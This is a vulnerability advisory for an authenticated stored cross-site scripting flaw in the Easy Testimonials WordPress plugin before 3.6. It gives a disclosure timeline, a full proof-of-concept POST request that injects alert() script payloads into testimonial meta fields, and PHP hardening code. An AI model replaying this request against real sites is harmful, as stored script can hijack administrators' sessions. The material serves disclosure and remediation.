Easy Testimonials < 3.6 - Authenticated Stored Cross-Site Scripting (XSS)

Type: wpexploit
WPEX-ID: 72252A15-98DE-44DC-A62B-9F2571D076AD
Published: 2020-05-13 00:00:00
Author: Ngo Van Thien

EPSS: 0.001
Percentile: 31.2%

Multiple cross-site scripting vulnerabilities in Easy Testimonials 3.5.2 and lower allow remote attackers to inject arbitrary web script or HTML via the Client Name, Position / Web Address / Other, Location Reviewed / Product Reviewed / Item Reviewed, and Rating parameters. Successful exploitation of this vulnerability allows an authenticated medium-privileged user (contributor+) to inject arbitrary JavaScript code, which is executed when admins and other users access the All Testimonials page in the backend. Furthermore, if the 'Allow HTML Tags in Testimonials' option is enabled (which is the default), the XSS is also triggered when the testimonial is displayed on the frontend.

Timeline (WPScanTeam):
May 9th, 2020 - Confirmed & escalated to WP Plugins Team
May 11th, 2020 - WP Plugins Team investigating
May 12th, 2020 - v3.6 released, fixing the issue

POST /wp-admin/post.php?post=176&action=edit&meta-box-loader=1&meta-box-loader-nonce=ee114d2173&_locale=user HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/post.php?post=176&action=edit
X-WP-Nonce: c12330b50c
Content-Type: multipart/form-data; boundary=---------------------------1097171016543246544154165286
Origin: http://example.com
Content-Length: 2729
DNT: 1
Connection: close
Cookie: wordpress_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7Ce020133190b2d0d55659fc79576f7341774c77f301b6096023e70f294549d103; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7C8642c6873c0009beb211174d3e93ed720f7d9826d71438fc48ac16ea7e999a66; wp-settings-3=libraryContent%3Dbrowse%26urlbutton%3Dnone%26posts_list_mode%3Dexcerpt; wp-settings-time-3=1588910767

-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wpnonce"

c627da8fa4
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/post.php?post=176&action=edit
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="user_ID"

3
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="action"

editpost
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="originalaction"

editpost
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="post_type"

testimonial
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="original_post_status"

publish
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="referredby"

http://example.com/testimonial/alerttitle/
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wp_original_http_referer"

http://example.com/testimonial/alerttitle/
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="post_ID"

176
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="meta-box-order-nonce"

e78bbacfea
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="closedpostboxesnonce"

cb99c6138d
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="samplepermalinknonce"

97e0ac6960
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="my-custom-fields_wpnonce"

f842632466
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_client"

<script>alert('Client name')</script>
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_email"

[email protected]
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_position"

<script>alert('Position / Web Address / Other')</script>
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_other"

<script>alert('Location Reviewed / Product Reviewed / Item Reviewed')</script>
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_rating"


-----------------------------1097171016543246544154165286--


#XSS TRIGGER POINT:
When an admin or other authenticated user loads the All Testimonials page (and, if 'Allow HTML Tags in Testimonials' is enabled, when the testimonial is rendered on the frontend).
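The defect behind the request above is that the `_ikcf_*` meta values are stored and later echoed without sanitization or escaping. The following is an added example of the corresponding hardening in WordPress/PHP; it is not the plugin's own code or the vendor's fix. The meta keys and the `my-custom-fields_wpnonce` field name are taken from the PoC request; the function names, the hook and the nonce action string `et_save_meta` are assumptions.

```php
<?php
// Added example (not Easy Testimonials' code): sanitize the affected meta
// fields on save and escape them again on output. Meta keys and the nonce
// field name come from the advisory's PoC; function/hook names and the
// nonce action 'et_save_meta' are hypothetical.

function et_hardened_save_testimonial_meta( int $post_id ): void {
    // Only act on the testimonial post type and never on autosaves.
    if ( get_post_type( $post_id ) !== 'testimonial' || wp_is_post_autosave( $post_id ) ) {
        return;
    }
    // Require the form nonce and the capability to edit this specific post.
    if ( ! isset( $_POST['my-custom-fields_wpnonce'] )
        || ! wp_verify_nonce( $_POST['my-custom-fields_wpnonce'], 'et_save_meta' )
        || ! current_user_can( 'edit_post', $post_id ) ) {
        return;
    }
    // Client name, position and item reviewed are plain text: strip all tags
    // regardless of the "Allow HTML Tags in Testimonials" option, which should
    // only ever apply to the testimonial body, not to these fields.
    foreach ( array( '_ikcf_client', '_ikcf_position', '_ikcf_other' ) as $key ) {
        if ( isset( $_POST[ $key ] ) ) {
            $clean = sanitize_text_field( wp_unslash( $_POST[ $key ] ) );
            update_post_meta( $post_id, $key, $clean );
        }
    }
    // Rating is numeric: coerce to an integer in range instead of storing text.
    if ( isset( $_POST['_ikcf_rating'] ) ) {
        $rating = max( 0, min( 5, (int) $_POST['_ikcf_rating'] ) );
        update_post_meta( $post_id, '_ikcf_rating', $rating );
    }
}
add_action( 'save_post_testimonial', 'et_hardened_save_testimonial_meta' );

// Escape at render time too, so values stored before the fix (e.g. the
// <script> payloads from the PoC) are shown as text rather than executed,
// both in the All Testimonials list and in frontend output.
function et_render_client_name( int $post_id ): string {
    $client   = (string) get_post_meta( $post_id, '_ikcf_client', true );
    $position = (string) get_post_meta( $post_id, '_ikcf_position', true );
    return '<span class="client" title="' . esc_attr( $position ) . '">'
        . esc_html( $client ) . '</span>';
}
```

Input sanitization alone is not sufficient here because already-stored payloads remain in the database after upgrading; output escaping in both the admin list and the frontend template is what neutralizes them.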
